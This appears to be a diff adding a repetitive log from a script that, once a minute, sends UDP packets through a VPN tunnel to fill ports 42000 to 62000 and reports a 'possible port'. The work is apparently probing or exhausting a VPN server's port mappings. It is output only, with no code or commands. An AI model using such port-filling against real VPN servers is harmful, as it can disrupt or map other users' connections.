+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:36:04 +Starting port fill at 2020-09-06 08:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:37:05 +Starting port fill at 2020-09-06 08:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:38:04 +Starting port fill at 2020-09-06 08:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:39:04 +Starting port fill at 2020-09-06 08:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:40:04 +Starting port fill at 2020-09-06 08:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:41:06 +Starting port fill at 2020-09-06 08:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:42:04 +Starting port fill at 2020-09-06 08:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:43:05 +Starting port fill at 2020-09-06 08:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:44:04 +Starting port fill at 2020-09-06 08:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:45:04 +Starting port fill at 2020-09-06 08:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:46:07 +Starting port fill at 2020-09-06 08:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:47:04 +Starting port fill at 2020-09-06 08:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:48:04 +Starting port fill at 2020-09-06 08:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:49:05 +Starting port fill at 2020-09-06 08:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:50:05 +Starting port fill at 2020-09-06 08:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:51:05 +Starting port fill at 2020-09-06 08:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:52:05 +Starting port fill at 2020-09-06 08:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:53:05 +Starting port fill at 2020-09-06 08:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:54:05 +Starting port fill at 2020-09-06 08:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:55:07 +Starting port fill at 2020-09-06 08:56:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:56:07 +Starting port fill at 2020-09-06 08:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:57:06 +Starting port fill at 2020-09-06 08:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:58:06 +Starting port fill at 2020-09-06 08:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:59:06 +Starting port fill at 2020-09-06 09:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:00:04 +Starting port fill at 2020-09-06 09:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 09:01:05 +Starting port fill at 2020-09-06 09:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 